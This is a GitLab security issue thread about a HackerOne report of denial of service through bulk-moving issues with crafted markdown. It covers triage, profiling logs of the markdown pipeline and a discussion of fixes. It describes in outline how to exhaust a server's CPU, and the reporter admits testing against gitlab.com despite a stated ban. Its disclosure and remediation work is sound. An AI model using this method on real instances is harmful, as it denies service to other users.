DOS via move_issue (Bypass #1543584)

added HackerOne WeaknessCWE-400 bugvulnerability priority3 security severity3 typebug labels

HackerOne comment by h1_analyst_indy:

Hi [@]setiawan_,

Thank you for your submission. I hope you are well. Your report is currently being reviewed and the HackerOne triage team will get back to you once there is additional information to share.

Have a great day!

Kind regards, [@]h1_analyst_indy

Comment originally created at 2024-05-02 09:55:44.172000+00:00

HackerOne comment by h1_analyst_indy:

Hi [@]setiawan_,

Thanks for your report!

Current PoC shows attacker's request failed, and CPU core may reach 100% temporarily. However, it doesn't show any Available impact to other users on the same instance.

Could you please provide additional PoC to demonstrate that this finding can impact other users? Thanks!

Kind regards, [@]h1_analyst_indy

Comment originally created at 2024-05-02 10:01:47.123000+00:00

HackerOne comment by setiawan_:

Hi . [@]h1_analyst_indy .

Could you please provide additional PoC to demonstrate that this finding can impact other users? Thanks!

I've attached the latest proof of concept. Other users really can't use the gitlab instance. I think this is a valid vulnerability and the report should be re-opened. Left screen: Other users (Firefox Browser) Right screen : Attacker (Chrome)

Current PoC shows attacker's request failed, and CPU core may reach 100% temporarily

Moving 5 issues at once completely burns all the CPU cores, and doing it repeatedly causes the instances to be deleted. moveissue.mp4

This bug can be exploited at gitlab.com

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

Comment originally created at 2024-05-02 14:15:46.438000+00:00

HackerOne comment by h1_analyst_indy:

Hi [@]setiawan_,

Thanks for the additional information!

This bug can be exploited at gitlab.com

First of all, as I mentioned several times in your other reports, please do not attempt to test potential DoS related issue on gitlab.com. It is prohibited. Please only perform such test on your own GitLab instance.

I will continue to validate this report and update you the program.

Kind regards, [@]h1_analyst_indy

Comment originally created at 2024-05-03 09:59:47.567000+00:00

HackerOne comment by h1_analyst_indy:

Hi [@]setiawan_,

Thanks for the additional information!

I created 6 Issues using [DoS_Move_Issues.txt](https://h1.sec.gitlab.net/a/b0c5cf41-ddc9-4ef0-9cd9-153fbc7146b4/DoS_Move_Issues.txt): DoS_Move_Issues.txt as issue description. When I moved all selected issues, I'm able to see several CPU cores reached 100%:

However, I can still load any project on my test instance using victim's account. Your PoC video doesn't show the impact to victim either. Therefore, current PoC doesn't appear to be causing any considerable Availability to other user.

If you are able to crash server or deny victim access to self-hosted GitLab instance, please provide an additional PoC. Thanks!

Kind regards, [@]h1_analyst_indy

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

2485172.png

Comment originally created at 2024-05-03 10:58:38.916000+00:00

HackerOne comment by setiawan_:

Hi. [@]h1_analyst_indy .

I created 6 Issues using DoS_Move_Issues.txt: DoS_Move_Issues.txt as issue description. When I moved all selected issues, I'm able to see several CPU cores reached 100%:

Yes, Thank you for trying to reproduce and confirm that the core CPU reaches 100%.

However, I can still load any project on my test instance using victim's account. Your PoC video doesn't show the impact to the victim either. Therefore, current PoC doesn't appear to be causing any considerable availability to other users.

It's true, moving one problem requires one CPU. Each move will use 100% cpu for 1 minute - the denial of service comes entirely from the amount of CPU on your gitlab instance. I think 20 requests to move all selected issues could lead to a complete denial of service.

This issue is a bypass report from https://hackerone.com/reports/1543584. You can see gitlab's internal team working on this issue. So immediately discuss it with the internal Gitlab team to validate this report.

Comment originally created at 2024-05-03 11:20:56.534000+00:00

HackerOne comment by setiawan_:

Hi [@]h1_analyst_indy .

If you are able to crash the server or deny victim access to self-hosted GitLab instance, please provide an additional PoC. Thanks!

Remembering I was using AWS ec2 with Billing and Cost Management consumption to do DoS testing wiped out my entire local instance. Can you try to reproduce it in parallel moving more than 6 problems?

Comment originally created at 2024-05-03 11:52:37.021000+00:00

HackerOne comment by setiawan_:

Hi. [@]h1_analyst_indy .

Just wanted to comment.

The report I sent is a bypass of the report sent by the previous researcher #1543584. I looked deep into the report here #362379 (comment 946300622) . Open the researcher's POC file recording-1652343565697.webm . I looked at the top command and it focused on memory , you can see the researchers used a machine with 8 GB of memory . This means that researchers did not follow the dos testing recommendations https://docs.gitlab.com/ee/administration/reference_architectures/1k_users.html 8vCPU and 16 GB memory. and this is still considered a valid report by gitlab internals, even getting a cvss score of Availability:High.

So at this stage it can be said that my report is valid, because all the reports I sent for DoS testing used 8vCPU and 16GB Memory. ready to be forwarded to the internal Gitlab team so that the status changes to triage. So I hope that when you read my comment you can immediately forward this report to Gitlab internally.

Kind regards, Sigit S.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

Desain_tanpa_judul_(1).png

Comment originally created at 2024-05-05 19:51:53.585000+00:00

HackerOne comment by setiawan_:

Hi. [@]h1_analyst_indy .

I can create a fully stopped local instance.

Left Side (Attacker) Google Chrome. Right Side (Sacrifice) Mozilla Firefox.

Attacker's POV: When moving an issue repeatedly the CPU core will experience a 100% CPU spike. When the attacker processes the issue move the victim gets http 502 because the CPU is too full and waiting to boot. Move_Issues.mp4 Victim's POV: The victim gets http 502 and cannot access anything in the instance.

Kind regards, Sigit S.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

Move_Issues.mp4

Comment originally created at 2024-05-06 09:14:52.954000+00:00

HackerOne comment by h1_analyst_indy:

Hi [@]setiawan_,

Thank you for your reply! I'm able to reproduce the issue in your report and have submitted it to the appropriate remediation team for review. They will let us know the final ruling on this report, and when/if a fix will be implemented. Please note that the status and severity are subject to change. Thanks!

Kind regards, [@]h1_analyst_indy

Comment originally created at 2024-05-06 11:13:07.944000+00:00

@digitalmoksha this report looks to be a bypass of #362379 (closed) which was a ReDOS vulnerability and was patched in 15.4.1

If this is also due to ReDOS, it is out of scope (for now) for our HackerOne program and we can close this, but I wanted to get another set of eyes on it before I close it. Please advise.

@kmorrison1 @cmaxim I think the real culprit here is banzai - moving the issues is just one way to highlight this.

I did a test using some new instrumentation code:

text = File.read("/Users/me/Desktop/DoS_Move_Issues.txt")
Banzai.render(text, project: nil, debug_timing: true)

and got

D, [2024-05-07T18:16:32.644291 #22893] DEBUG -- :   0.000028 : NormalizeSourceFilter [PreProcessPipeline]
D, [2024-05-07T18:16:32.644481 #22893] DEBUG -- :   0.000028 : TruncateSourceFilter [PreProcessPipeline]
D, [2024-05-07T18:16:32.648910 #22893] DEBUG -- :   0.004368 : FrontMatterFilter [PreProcessPipeline]
D, [2024-05-07T18:16:32.699282 #22893] DEBUG -- :   0.000011 : MarkdownPreEscapeLegacyFilter [FullPipeline]
D, [2024-05-07T18:16:32.699330 #22893] DEBUG -- :   0.000004 : DollarMathPreLegacyFilter [FullPipeline]
D, [2024-05-07T18:16:32.700041 #22893] DEBUG -- :   0.000677 : BlockquoteFenceLegacyFilter [FullPipeline]
D, [2024-05-07T18:16:32.828231 #22893] DEBUG -- :   0.128093 : MarkdownFilter [FullPipeline]
D, [2024-05-07T18:16:33.605640 #22893] DEBUG -- :   0.777299 : DollarMathPostLegacyFilter [FullPipeline]
D, [2024-05-07T18:16:33.605729 #22893] DEBUG -- :   0.000013 : MarkdownPostEscapeLegacyFilter [FullPipeline]
D, [2024-05-07T18:16:33.619701 #22893] DEBUG -- :   0.013897 : CodeLanguageFilter [FullPipeline]
D, [2024-05-07T18:16:33.637250 #22893] DEBUG -- :   0.017438 : PlantumlFilter [FullPipeline]
D, [2024-05-07T18:16:34.233487 #22893] DEBUG -- :   0.596108 : SpacedLinkFilter [FullPipeline]
D, [2024-05-07T18:16:42.512124 #22893] DEBUG -- :   8.278521 : SanitizationFilter [FullPipeline]
D, [2024-05-07T18:16:42.521073 #22893] DEBUG -- :   0.008832 : EscapedCharFilter [FullPipeline]
D, [2024-05-07T18:16:42.522944 #22893] DEBUG -- :   0.001797 : KrokiFilter [FullPipeline]
D, [2024-05-07T18:16:43.268925 #22893] DEBUG -- :   0.745901 : GollumTagsFilter [FullPipeline]
D, [2024-05-07T18:16:43.269016 #22893] DEBUG -- :   0.000025 : AssetProxyFilter [FullPipeline]
D, [2024-05-07T18:16:43.294147 #22893] DEBUG -- :   0.025060 : MathFilter [FullPipeline]
D, [2024-05-07T18:16:43.302517 #22893] DEBUG -- :   0.008250 : ColorFilter [FullPipeline]
D, [2024-05-07T18:16:43.311308 #22893] DEBUG -- :   0.008672 : MermaidFilter [FullPipeline]
D, [2024-05-07T18:16:43.319652 #22893] DEBUG -- :   0.008232 : AttributesFilter [FullPipeline]
D, [2024-05-07T18:16:43.328286 #22893] DEBUG -- :   0.008517 : VideoLinkFilter [FullPipeline]
D, [2024-05-07T18:16:43.336770 #22893] DEBUG -- :   0.008337 : AudioLinkFilter [FullPipeline]
D, [2024-05-07T18:16:43.345085 #22893] DEBUG -- :   0.008209 : ImageLazyLoadFilter [FullPipeline]
D, [2024-05-07T18:16:43.353504 #22893] DEBUG -- :   0.008320 : ImageLinkFilter [FullPipeline]
D, [2024-05-07T18:16:43.403654 #22893] DEBUG -- :   0.050053 : TableOfContentsLegacyFilter [FullPipeline]
D, [2024-05-07T18:16:43.493668 #22893] DEBUG -- :   0.089898 : TableOfContentsTagFilter [FullPipeline]
D, [2024-05-07T18:16:44.077953 #22893] DEBUG -- :   0.584170 : AutolinkFilter [FullPipeline]
D, [2024-05-07T18:16:44.086947 #22893] DEBUG -- :   0.008882 : ExternalLinkFilter [FullPipeline]
D, [2024-05-07T18:16:44.087026 #22893] DEBUG -- :   0.000010 : SuggestionFilter [FullPipeline]
D, [2024-05-07T18:16:44.095421 #22893] DEBUG -- :   0.008323 : FootnoteFilter [FullPipeline]
D, [2024-05-07T18:16:46.278212 #22893] DEBUG -- :   2.182678 : InlineDiffFilter [FullPipeline]
D, [2024-05-07T18:16:46.733582 #22893] DEBUG -- :   0.455239 : References::EpicReferenceFilter [FullPipeline]
D, [2024-05-07T18:16:46.733675 #22893] DEBUG -- :   0.000026 : References::IterationReferenceFilter [FullPipeline]
D, [2024-05-07T18:16:46.733701 #22893] DEBUG -- :   0.000008 : References::IterationsCadenceReferenceFilter [FullPipeline]
D, [2024-05-07T18:16:46.733724 #22893] DEBUG -- :   0.000007 : References::VulnerabilityReferenceFilter [FullPipeline]
D, [2024-05-07T18:16:46.733746 #22893] DEBUG -- :   0.000009 : References::UserReferenceFilter [FullPipeline]
D, [2024-05-07T18:16:46.902839 #22893] DEBUG -- :   0.169027 : References::ProjectReferenceFilter [FullPipeline]
D, [2024-05-07T18:16:46.902921 #22893] DEBUG -- :   0.000018 : References::DesignReferenceFilter [FullPipeline]
D, [2024-05-07T18:16:46.902947 #22893] DEBUG -- :   0.000008 : References::IssueReferenceFilter [FullPipeline]
D, [2024-05-07T18:16:46.902969 #22893] DEBUG -- :   0.000008 : References::WorkItemReferenceFilter [FullPipeline]
D, [2024-05-07T18:16:46.902989 #22893] DEBUG -- :   0.000007 : References::ExternalIssueReferenceFilter [FullPipeline]
D, [2024-05-07T18:16:46.903009 #22893] DEBUG -- :   0.000006 : References::MergeRequestReferenceFilter [FullPipeline]
D, [2024-05-07T18:16:46.903028 #22893] DEBUG -- :   0.000006 : References::SnippetReferenceFilter [FullPipeline]
D, [2024-05-07T18:16:46.903048 #22893] DEBUG -- :   0.000008 : References::CommitRangeReferenceFilter [FullPipeline]
D, [2024-05-07T18:16:46.903067 #22893] DEBUG -- :   0.000007 : References::LabelReferenceFilter [FullPipeline]
D, [2024-05-07T18:16:46.903085 #22893] DEBUG -- :   0.000006 : References::MilestoneReferenceFilter [FullPipeline]
D, [2024-05-07T18:16:46.903103 #22893] DEBUG -- :   0.000006 : References::AlertReferenceFilter [FullPipeline]
D, [2024-05-07T18:16:46.903122 #22893] DEBUG -- :   0.000006 : References::FeatureFlagReferenceFilter [FullPipeline]
D, [2024-05-07T18:16:46.903139 #22893] DEBUG -- :   0.000005 : References::CommitReferenceFilter [FullPipeline]
D, [2024-05-07T18:16:48.853390 #22893] DEBUG -- :   1.950158 : EmojiFilter [FullPipeline]
D, [2024-05-07T18:16:48.853463 #22893] DEBUG -- :   0.000008 : CustomEmojiFilter [FullPipeline]
D, [2024-05-07T18:16:48.898753 #22893] DEBUG -- :   0.045213 : TaskListFilter [FullPipeline]
D, [2024-05-07T18:16:48.898876 #22893] DEBUG -- :   0.000056 : SetDirectionFilter [FullPipeline]
D, [2024-05-07T18:16:48.907421 #22893] DEBUG -- :   0.008478 : SyntaxHighlightFilter [FullPipeline]

We can see the SanitizationFilter is taking 8.278521, and the InlineDiffFilter is taking 2.182678. That's 10.5 seconds just with those two filters.

This kind of relates to DoS when using excessive number of inline code (#429596 - closed) and https://gitlab.com/gitlab-org/gitlab/-/issues/434803+ (and there is another one that is open, I just don't see it at the moment, my eyes are starting to cross). It's not about a bad regex, but the fact that a huge number of html nodes are created and we need to operate on them, whether it's sanitizing them, or adding emoji classes, etc.

The issue I'm thinking of is https://gitlab.com/gitlab-org/gitlab/-/issues/457816+, where I commented

This hits many filters. Some might be the regex patterns in those filters, others is a more general problem I've started seeing when we have massive amounts of html to update. For example https://gitlab.com/gitlab-org/security/gitlab/-/merge_requests/3924 where there are a gazillion emojis for us to put our special html tags on. Or #429596 (closed) which I noticed. When we have to decorate lots of HTML with our own attributes, it can really take time to complete that.

This class of problem is not as easy to fix. Some can have imposed limits. But obviously we can't limit sanitization. We might get some relief from using the latest version of html-pipeline, which replaces the use of nokogiri with a more high performance Rust version called Selma.

Selma's strength (aside from being backed by Rust) is that HTML content is parsed once and can be manipulated multiple times.

So there are things are can try. However one of the difficulties of say using the new version of html-pipeline is that it's a bit of an upgrade. And not something I'm crazy about doing in a security patch with 3 back ports.

So I don't know how you guys want to handle these...

/cc @donaldcook @vshushlin

@digitalmoksha can you help me to understand this a bit better?

Do you agree on the severity3 / priority3 here?
How much effort do you think it will take to fix it "the right way"?
I notice that we have quite a lot of issues related to markdown that can cause some sort of vulnerability. Is there anything we can do to limit the impact of those DoS attacks? E.g. set a fixed time limit for every filter or limit for the whole pipeline? Ideally, something that would allow us to reduce all those issues to severity4
Do you think groupknowledge should own all the security issues related to markdown? Is there a way to split the responsibility with some other teams?
If following the security process is too costly, can we somehow fix it via normal development process without directly exposing the vulnerability?

@digitalmoksha thanks for that analysis. So this is generally just about performance limitations in certain situations.

@cmaxim as SC for groupproject management what are your thoughts? If this was ReDOS it would be out of scope for H1, but as it is we will be subject to SLAs to remediate this.

@vshushlin

Do you agree on the severity3 / priority3 here?

Makes sense
How much effort do you think it will take to fix it "the right way"?

I really don't know yet, it needs more investigation. Though I would prefer a 90 day SLA versus a 60 day one.
I notice that we have quite a lot of issues related to markdown that can cause some sort of vulnerability. Is there anything we can do to limit the impact of those DoS attacks? E.g. set a fixed time limit for every filter or limit for the whole pipeline? Ideally, something that would allow us to reduce all those issues to severity4

Unfortunately we can't put a timeout on all filters. This is because Ruby's Timeout method is unsafe. I thought maybe it had changed in Ruby 3.2, but it hasn't, and Stan pointed me to an article I had forgotten about, https://jvns.ca/blog/2015/11/27/why-rubys-timeout-is-dangerous-and-thread-dot-raise-is-terrifying/

We do use it for say the SyntaxHighlighterFilter, and we can judiciously add it other filters. But adding it to everything also just hides problems that really should be fixed.

And it can't be used for the SanitizationFilter - if we can't sanitize completely, then we can't show anything. If I can't fix the filter, then as a last resort we might have to timeout the filter and abort the entire pipeline.
Do you think groupknowledge should own all the security issues related to markdown? Is there a way to split the responsibility with some other teams?

In general, yes. Most of the ones we're seeing are core pipeline/filter problems, and I do think we own those. There are exceptions, for example the gollum regex issue, I would look to whoever owns the wiki code fix that one .
If following the security process is too costly, can we somehow fix it via normal development process without directly exposing the vulnerability?

This I would like to do. For example, upgrading html-pipeline (once I verify that it will help) I would like to be able to do in canonical, and not backport it. Backporting would be a huge amount of work. And we already have an issue tracking it: Upgrade html-pipeline to V3 (#412562)

Also worth noting is that this issue is really a duplicate of https://gitlab.com/gitlab-org/gitlab/-/issues/457816+, which is really a duplicate of an issue I opened, DoS when using excessive number of inline code (#429596 - closed), in the sense that the root cause is pretty much the same. Most of the slowdowns using the patterns mentioned there are due to sanitization. Fix that, and most of the them go away.

added groupproject management label

added Category:Team Planning devopsplan sectiondev labels

@gweaver @donaldcook This vulnerability needs to be assigned a milestone that meets GitLab's Remediation SLAs.

If this vulnerability is for a featureflagdisabled issue, regular SLOs don't apply and it simply should be scheduled to be fixed before the feature is made generally available. If you need an exception to the SLA, follow the SLA exception procedures.

cc @cmaxim

changed due date to July 18, 2024

This vulnerability was rated severity3 on 2024-05-06, and must be fixed within 90 days. To meet the remediation SLA, the change must make it into the security release before 2024-07-18 (the monthly release date before the remediation SLA).

This Issue should have an issue status of closed or a workflow status of workflowawaiting security release no later than the end of the 17.2 Milestone to avoid being past due.

If you cannot remediate this within the SLA, please open a Deviation Request. @ mention your AppSec Stable Counterpart if you need assistance.

DOS via move_issue (Bypass #1543584)

Report

Summary

Steps to reproduce

Output of checks

Results of GitLab environment info

Impact

Attachments

How To Reproduce

Designs

Child items ...

Activity

Attachments

Attachments

Attachments

Attachments